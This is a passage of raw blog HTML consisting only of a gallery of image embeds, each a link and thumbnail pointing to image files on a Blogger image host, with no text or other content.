<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJbupFzlz21M4tP9im4UBHwRbVpDa9jFrg0kX_mmE-1oSgctfvalLOZxUHHGFCrW0P7sGgGSw07uddItP7zzDRfzfRkNJzVkDRBELiF9eKCUdXSzzpPGUx7iYlC5sBo59I9ertD63qzw/s1600/yA4gKtr7.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJbupFzlz21M4tP9im4UBHwRbVpDa9jFrg0kX_mmE-1oSgctfvalLOZxUHHGFCrW0P7sGgGSw07uddItP7zzDRfzfRkNJzVkDRBELiF9eKCUdXSzzpPGUx7iYlC5sBo59I9ertD63qzw/s320/yA4gKtr7.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7mvscGFFasqlGpSJZPTUiTQDleNTk05gkMaDBYSUdyvoBiDbwuj24kIOKqadSNH45h4mMQFXQHGFpZi6deT-7guso68FKmC7XiWbeeJE6gj5Pg9il5F-yAtV3sLOSufVE5_aOMn6PerA/s1600/yA4gKtr9.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7mvscGFFasqlGpSJZPTUiTQDleNTk05gkMaDBYSUdyvoBiDbwuj24kIOKqadSNH45h4mMQFXQHGFpZi6deT-7guso68FKmC7XiWbeeJE6gj5Pg9il5F-yAtV3sLOSufVE5_aOMn6PerA/s320/yA4gKtr9.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN2r8Am6JYj780LOh2v7WiQktIpzjhzsVfHIO014r8f1BqtwQe92bGLC64SbJ_9dzGsesqc8H-FBbKtlpYfVuiUapkadUYsXWvd7nm3YiRhn_fdY23MfF-XUC-Wqm-LL1Zmm7FH2RpSaE/s1600/yA4gKtr1.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhN2r8Am6JYj780LOh2v7WiQktIpzjhzsVfHIO014r8f1BqtwQe92bGLC64SbJ_9dzGsesqc8H-FBbKtlpYfVuiUapkadUYsXWvd7nm3YiRhn_fdY23MfF-XUC-Wqm-LL1Zmm7FH2RpSaE/s320/yA4gKtr1.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVh1q0jeAAIUFVup5IA1bjN4f-QISUcipK8NC_flER6jntDnQ3cjb_tVJ4cidBzcDUG7bOFW8VVEwmD-WTycE_OkuKbjyu7ovLyB56NFID2NJn6qXxbcV3Ix7wvrJR0dU8qxX-NWIESU/s1600/Xc3Lqnw8aW5MM7v.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGVh1q0jeAAIUFVup5IA1bjN4f-QISUcipK8NC_flER6jntDnQ3cjb_tVJ4cidBzcDUG7bOFW8VVEwmD-WTycE_OkuKbjyu7ovLyB56NFID2NJn6qXxbcV3Ix7wvrJR0dU8qxX-NWIESU/s320/Xc3Lqnw8aW5MM7v.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVobnoP3jsLuCIL-C4MP7Ovv7yGl4UvoSkiKSoDFiAJuF39-oobREtmDGjHa6JhfaDdOUWkBnfNF1kPISqL60kr-hQfvKJyWqmKwVdYgmRZBRtNeD-zUs8pP4AGm92ySU0Efr6ABaFQSU/s1600/Xc3Lqnw8aW5MM7v.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVobnoP3jsLuCIL-C4MP7Ovv7yGl4UvoSkiKSoDFiAJuF39-oobREtmDGjHa6JhfaDdOUWkBnfNF1kPISqL60kr-hQfvKJyWqmKwVdYgmRZBRtNeD-zUs8pP4AGm92ySU0Efr6ABaFQSU/s320/Xc3Lqnw8aW5MM7v.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrPSn3tXtDDHjRua3H64kLstmDKngydJ4P0byOQxVEmPfnvQkuoJsD07W0SZOSxK0pAkD42Cpd_qvu5-n2aC_-Rz72xEi5JAmss8YwUL6R2eXl71OuQiAAfOxM-vWF2steRlL657TcGJE/s1600/VZIgbUuN.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrPSn3tXtDDHjRua3H64kLstmDKngydJ4P0byOQxVEmPfnvQkuoJsD07W0SZOSxK0pAkD42Cpd_qvu5-n2aC_-Rz72xEi5JAmss8YwUL6R2eXl71OuQiAAfOxM-vWF2steRlL657TcGJE/s320/VZIgbUuN.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw2oa489fY-ZFEZWoxFhiJXUdrvlw04aJntL7ikKpT8irKn_Bh_FQkHwyL49wtk4pwzfmVXK5aPa30J9hCyUsbeUCzQShJN0wyZnCp2irlB4X7mgYJIJYCmiwk1fFc8zUvHjXBMh5Mzhc/s1600/VZIgbUuN.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw2oa489fY-ZFEZWoxFhiJXUdrvlw04aJntL7ikKpT8irKn_Bh_FQkHwyL49wtk4pwzfmVXK5aPa30J9hCyUsbeUCzQShJN0wyZnCp2irlB4X7mgYJIJYCmiwk1fFc8zUvHjXBMh5Mzhc/s320/VZIgbUuN.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc1u5KzkfKlcTZ8KlYFL7D2L9Z8APU1IUYmCGN7UMqnN_dVJCINWGa6ilhUBbQ51uarB5cLRZwWP9CgNDCT133mDbdEWhCo086wV1_Ad-QWhbOZeUZ7Wu3VOZvB-jq5JakWYvSQ-BCuKc/s1600/VbswDahFVWnGo4W.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc1u5KzkfKlcTZ8KlYFL7D2L9Z8APU1IUYmCGN7UMqnN_dVJCINWGa6ilhUBbQ51uarB5cLRZwWP9CgNDCT133mDbdEWhCo086wV1_Ad-QWhbOZeUZ7Wu3VOZvB-jq5JakWYvSQ-BCuKc/s320/VbswDahFVWnGo4W.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiybKOFXaGI8ic2iMfokuwiMb261XJogYpDyZpv25ZezPkGofaNdkL-7YtV2Xgw9nkE6KZJiHQqN3_wn5Wsrg8_X2MJN-z6Xv4XsdwJlM1etOduGgIvXGlPfDTWFb2u5L9myMppQgE2Sfs/s1600/owJQBwpX.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiybKOFXaGI8ic2iMfokuwiMb261XJogYpDyZpv25ZezPkGofaNdkL-7YtV2Xgw9nkE6KZJiHQqN3_wn5Wsrg8_X2MJN-z6Xv4XsdwJlM1etOduGgIvXGlPfDTWFb2u5L9myMppQgE2Sfs/s320/owJQBwpX.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp3VXHGDZy_mOjQaUzP9OPSI-Ng12dll7o7ROUw_sahAlXEqekT3kfUfjcpsxAC0gcfUJebiF8_Kv_gligtJx1dUfYf3WucJHQsU5xzb3zyFnfbzLrUsF3XAM6uS8EocaTmb84uL3PT0/s1600/owJQBwpX.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOp3VXHGDZy_mOjQaUzP9OPSI-Ng12dll7o7ROUw_sahAlXEqekT3kfUfjcpsxAC0gcfUJebiF8_Kv_gligtJx1dUfYf3WucJHQsU5xzb3zyFnfbzLrUsF3XAM6uS8EocaTmb84uL3PT0/s320/owJQBwpX.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWFItZKxAXuX4-gWynA-DXJVnl8gzLSUEk333KV6Ib694Ud1jqPmQaCRY1_ZzfU1YpK-4q9DPHWVOjFkJjBVdrXdbe2dn-f2aODCXAZga_4QGI1CLOYJub5VkhsYh6X-OSMQ-pMUOA-yU/s1600/s1y0ikn79G3UmS5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWFItZKxAXuX4-gWynA-DXJVnl8gzLSUEk333KV6Ib694Ud1jqPmQaCRY1_ZzfU1YpK-4q9DPHWVOjFkJjBVdrXdbe2dn-f2aODCXAZga_4QGI1CLOYJub5VkhsYh6X-OSMQ-pMUOA-yU/s320/s1y0ikn79G3UmS5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8jNdRFhJh5YdhJRUKMQAw7d4WdpUKEVtbsbQ_l5QqKx7rPlL1LUMRYzwFhlbV0tsP6xx9XzPxDuV8oBLesWRlRu59aFWwkyxETUqFRymf3yQdh9iAKGfyzsw2wFcF2L7kW1uymrEgx1s/s1600/TWNeiU8aq.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8jNdRFhJh5YdhJRUKMQAw7d4WdpUKEVtbsbQ_l5QqKx7rPlL1LUMRYzwFhlbV0tsP6xx9XzPxDuV8oBLesWRlRu59aFWwkyxETUqFRymf3yQdh9iAKGfyzsw2wFcF2L7kW1uymrEgx1s/s320/TWNeiU8aq.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAC77gLXwlGDHHE1Gd927uZ8QJkElsF1hAPTpMeOaJJqOgmLp2Zh7Ibh34XcarbISpNBh2yJK-Zb11K2ISSc4-9I9_RTgvjLO-1wF8xkFMpEX7blL4IYWiXTUNvCQ6-ayoTYnQnPXHsLw/s1600/VbswDahFVWnGo4W.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAC77gLXwlGDHHE1Gd927uZ8QJkElsF1hAPTpMeOaJJqOgmLp2Zh7Ibh34XcarbISpNBh2yJK-Zb11K2ISSc4-9I9_RTgvjLO-1wF8xkFMpEX7blL4IYWiXTUNvCQ6-ayoTYnQnPXHsLw/s320/VbswDahFVWnGo4W.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IKekLGpfUoNyFlPHwhGKNRGxcN8W6z71hZkkG3z3Nj1OAOXABVrCAyzvzMKYKafPA7t65_kM5tvNhbWMfAT9twSlNKn7EZr7oWFJBcRZJj751LaDZUv6jWg96CZ5l3ivPQtpzmaK45k/s1600/SWsK8y8cKX2Bha.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9IKekLGpfUoNyFlPHwhGKNRGxcN8W6z71hZkkG3z3Nj1OAOXABVrCAyzvzMKYKafPA7t65_kM5tvNhbWMfAT9twSlNKn7EZr7oWFJBcRZJj751LaDZUv6jWg96CZ5l3ivPQtpzmaK45k/s320/SWsK8y8cKX2Bha.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW3RiT4TpD7F8MV0tN7fQ3sW37Lv0hQepUNl5tEsXsDqxhbI0yPo5xcyPlIYUNaDVdrCkk0lpH3cvHCGn8y7t4DXKnOI8rQRksCDYZEx04euPLpZuhlm4mkdKxnZ-KHLN495gOS030mas/s1600/OTPCJIMquMN.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW3RiT4TpD7F8MV0tN7fQ3sW37Lv0hQepUNl5tEsXsDqxhbI0yPo5xcyPlIYUNaDVdrCkk0lpH3cvHCGn8y7t4DXKnOI8rQRksCDYZEx04euPLpZuhlm4mkdKxnZ-KHLN495gOS030mas/s320/OTPCJIMquMN.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1wyCbywoAMoehbufyRC89W4vaWqAlJId_I8NV-S6MBx6VoxaCQLwh68okGg-ViH2qMB3O71lzmkO8BsWOmZgM_f0N7TJoRWm0yHOtFoK5MU27oAY113GXMysnvsMme5XTmtmnJZUOiA/s1600/OTPCJIMquMN.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-1wyCbywoAMoehbufyRC89W4vaWqAlJId_I8NV-S6MBx6VoxaCQLwh68okGg-ViH2qMB3O71lzmkO8BsWOmZgM_f0N7TJoRWm0yHOtFoK5MU27oAY113GXMysnvsMme5XTmtmnJZUOiA/s320/OTPCJIMquMN.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGt0TgVufmPTc8QNw53CULu3o-Oddx4RywAnNt4Lfl7H2zeMNEXopJL9bUKhyXgGAG1Rz6uoTaS7lrrLsm5vddQNe5chJ5r3qARogVsmCL4gSBLyx6bv7Xxko7WyIxC7L6PnNnWqNMX0Y/s1600/ORv4Ucb3VAhz795.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGt0TgVufmPTc8QNw53CULu3o-Oddx4RywAnNt4Lfl7H2zeMNEXopJL9bUKhyXgGAG1Rz6uoTaS7lrrLsm5vddQNe5chJ5r3qARogVsmCL4gSBLyx6bv7Xxko7WyIxC7L6PnNnWqNMX0Y/s320/ORv4Ucb3VAhz795.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji6C1cUwDCV3elpivRdq313aHoeDNsTGLzISZdpezhqo6BtuAxwIc2hA8py-h5swSQErNltReuaHJqnSwnJ8HsTIzvfGyyZ_9PndTLgk9RNtrlyrhp27lNjZ0qyIjOuThikuvZ4NS9CnQ/s1600/ORv4Ucb3VAhz796.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEji6C1cUwDCV3elpivRdq313aHoeDNsTGLzISZdpezhqo6BtuAxwIc2hA8py-h5swSQErNltReuaHJqnSwnJ8HsTIzvfGyyZ_9PndTLgk9RNtrlyrhp27lNjZ0qyIjOuThikuvZ4NS9CnQ/s320/ORv4Ucb3VAhz796.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXxVA7RwUCwNfO3tH6sagGdeHt5YQ_aifu9eoz4ft8fOJbko7WiNqFRUhOSu91Uglb9d5ny8qQ7RURgOv0uOFhfLEJ-b4BHsYOUU8nM-uyYpLMa4mujeRJQFj1UB86J8kK5gMgC255Wsw/s1600/ORv4Ucb3VAhz793.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXxVA7RwUCwNfO3tH6sagGdeHt5YQ_aifu9eoz4ft8fOJbko7WiNqFRUhOSu91Uglb9d5ny8qQ7RURgOv0uOFhfLEJ-b4BHsYOUU8nM-uyYpLMa4mujeRJQFj1UB86J8kK5gMgC255Wsw/s320/ORv4Ucb3VAhz793.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu2dbNFMTKF4abLM4dzJ6X_ElHZdBcGX_o68xRWPyq3qPlwbhkm_Yn9BBLcgGhd7wAfr-G_mLBdDrlOsOkbqB481j07DXNlAMqvrnElJmhPFBf2J3rrO1f4gW9bxdNHbreJOE9C9YUpDw/s1600/ORv4Ucb3VAhz791.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiu2dbNFMTKF4abLM4dzJ6X_ElHZdBcGX_o68xRWPyq3qPlwbhkm_Yn9BBLcgGhd7wAfr-G_mLBdDrlOsOkbqB481j07DXNlAMqvrnElJmhPFBf2J3rrO1f4gW9bxdNHbreJOE9C9YUpDw/s320/ORv4Ucb3VAhz791.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtTlByg0QXFxhU_OxiGP8sgthyX5sUpTeIqlKNzeKWPm8mOMvqfg9IuaWgO2kSwKJqO4XutOtZMonLrwXr2sbSzsV1QdPMiw8BihhuB2F2zv1caRxbQCr9stD12OIIH6nZggOyLbxaL38/s1600/NQiQt524yEJw.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtTlByg0QXFxhU_OxiGP8sgthyX5sUpTeIqlKNzeKWPm8mOMvqfg9IuaWgO2kSwKJqO4XutOtZMonLrwXr2sbSzsV1QdPMiw8BihhuB2F2zv1caRxbQCr9stD12OIIH6nZggOyLbxaL38/s320/NQiQt524yEJw.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTvJ7-yT-nq0o7iXwOu5Gg4ePJdzT97hqK5rFbNRdzZWjHe2hwV0KLxQ_yvx3FEExW7OuJCNftRjTF2Q-g29Ak9GNQtSWEexFa_UgQBlQRI6xB_jFtnkpAIO32V5nWLyW-8NyPBEPGv-A/s1600/nvHDQ5Zd.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTvJ7-yT-nq0o7iXwOu5Gg4ePJdzT97hqK5rFbNRdzZWjHe2hwV0KLxQ_yvx3FEExW7OuJCNftRjTF2Q-g29Ak9GNQtSWEexFa_UgQBlQRI6xB_jFtnkpAIO32V5nWLyW-8NyPBEPGv-A/s320/nvHDQ5Zd.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOzWepvGCLyDsKUokMTNYqvn1LonW7RkH2jA7Y0Th3tsxgtob-U-bFBD5d1lIGC1D3g7iuVOSQYtWq2JN5iVNvCmC1VKTNQTmLKq1osO3RIdpaVH0pcBQdzY6baRoJ9rPnWNFV3dUFS14/s1600/nvHDQ5Zd.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOzWepvGCLyDsKUokMTNYqvn1LonW7RkH2jA7Y0Th3tsxgtob-U-bFBD5d1lIGC1D3g7iuVOSQYtWq2JN5iVNvCmC1VKTNQTmLKq1osO3RIdpaVH0pcBQdzY6baRoJ9rPnWNFV3dUFS14/s320/nvHDQ5Zd.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPXP4pd5yymmHs_vDY5S-W7tPtiaVzZZRNvqMQljWviVkFER714f2qJ8LPB92MXZ0Zt7OQrhtalF9pliEg0Yau2jJoZWiKvyl1d1tDHKQJW3T-VR7mC2u9EUtKdNSCeLoL0P8UnZFnJuY/s1600/nwEckMNTC.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPXP4pd5yymmHs_vDY5S-W7tPtiaVzZZRNvqMQljWviVkFER714f2qJ8LPB92MXZ0Zt7OQrhtalF9pliEg0Yau2jJoZWiKvyl1d1tDHKQJW3T-VR7mC2u9EUtKdNSCeLoL0P8UnZFnJuY/s320/nwEckMNTC.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WVrAgQ0bjZTH0hHhrfL24HQ4eprprQ16P6mFp5ZOMZ8SuS9h-qXj5iVAi4OpYB6HRdjwyvhf2SFk9LL6wZEuZVXM_3Lwrmy_BzLqctYPxKkXsZhRh2YnJW0rGrJQsQGddNnILhXkRy4/s1600/nxvtZOMSBWCd5ftW.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_WVrAgQ0bjZTH0hHhrfL24HQ4eprprQ16P6mFp5ZOMZ8SuS9h-qXj5iVAi4OpYB6HRdjwyvhf2SFk9LL6wZEuZVXM_3Lwrmy_BzLqctYPxKkXsZhRh2YnJW0rGrJQsQGddNnILhXkRy4/s320/nxvtZOMSBWCd5ftW.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitTetyxz5jXHdpMPDGWQcQFxhSAweqxPu6hQ4tK4Xm8P3bZRtsd8Ouyq617P8XkPjxo9i6VoPdXVWG3tKPo6lo24Gh2Oko5eN7d9zvd2wfiWC7TKc1PgBdYKPay1htFKkSYX6xpc_ExUE/s1600/ORv4Ucb3VAhz79.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitTetyxz5jXHdpMPDGWQcQFxhSAweqxPu6hQ4tK4Xm8P3bZRtsd8Ouyq617P8XkPjxo9i6VoPdXVWG3tKPo6lo24Gh2Oko5eN7d9zvd2wfiWC7TKc1PgBdYKPay1htFKkSYX6xpc_ExUE/s320/ORv4Ucb3VAhz79.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOswGrtCj2O78C7c_c3eY_v_N0lvDjbu6m70TUJVwxNCCuytg395WrqvCEBXo5v5TmHjADx811Rays5gqjnSfrfyQmEOYo9NuNqCFFLfN_I_G6GsxsZwEnTnM_O8LGVvGB2lQ38YEpFIk/s1600/NQiQt524yEJw.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOswGrtCj2O78C7c_c3eY_v_N0lvDjbu6m70TUJVwxNCCuytg395WrqvCEBXo5v5TmHjADx811Rays5gqjnSfrfyQmEOYo9NuNqCFFLfN_I_G6GsxsZwEnTnM_O8LGVvGB2lQ38YEpFIk/s320/NQiQt524yEJw.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPmOYmlIkN1KLiris8KjAWqZP78gxI53DB-iXGNw6WYvoc-ctKsKC_cMp-V_KpeoD1eaRyf-T4G0LCzzHTVJ-NTjWZjwIsmWBCofsXENdCSzBC7g5DH0cvG7BRtmxL6xgcNShUHvCX9c/s1600/NQiQt524yEJw7.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPmOYmlIkN1KLiris8KjAWqZP78gxI53DB-iXGNw6WYvoc-ctKsKC_cMp-V_KpeoD1eaRyf-T4G0LCzzHTVJ-NTjWZjwIsmWBCofsXENdCSzBC7g5DH0cvG7BRtmxL6xgcNShUHvCX9c/s320/NQiQt524yEJw7.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMf8WC3SQcjzLpBSEFsXdzP620mEyk9iCkhrNKrn9MfhGaBBIv-PvoKqJN5Q5Thqm5qBu9qh4v1moqAZcOs8_jTwkdqsT1NquHDJgqjRE2yPzj2p84ZrnbNMvEd41S-DX1Ijn0Q99tRQ/s1600/NQiQt524yEJw7.Picture.Data+-+copia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqMf8WC3SQcjzLpBSEFsXdzP620mEyk9iCkhrNKrn9MfhGaBBIv-PvoKqJN5Q5Thqm5qBu9qh4v1moqAZcOs8_jTwkdqsT1NquHDJgqjRE2yPzj2p84ZrnbNMvEd41S-DX1Ijn0Q99tRQ/s320/NQiQt524yEJw7.Picture.Data+-+copia.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtrzlXyIkHnVQU1IxgzYGONFzw_ZVT_b7eh72i9vMf1aGDkc0Tguj7udJZWrfuH3LgSgzNSVNGakSSFLTQ95MzMhdejVGGVq-9NHQj8GfoiuQctIF4NzyLEqvoclhR2L2hqr1mC3RFYA/s1600/NQiQt524yEJw5.Picture.Data.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="620" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJtrzlXyIkHnVQU1IxgzYGONFzw_ZVT_b7eh72i9vMf1aGDkc0Tguj7udJZWrfuH3LgSgzNSVNGakSSFLTQ95MzMhdejVGGVq-9NHQj8GfoiuQctIF4NzyLEqvoclhR2L2hqr1mC3RFYA/s320/NQiQt524yEJw5.Picture.Data.jpg" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
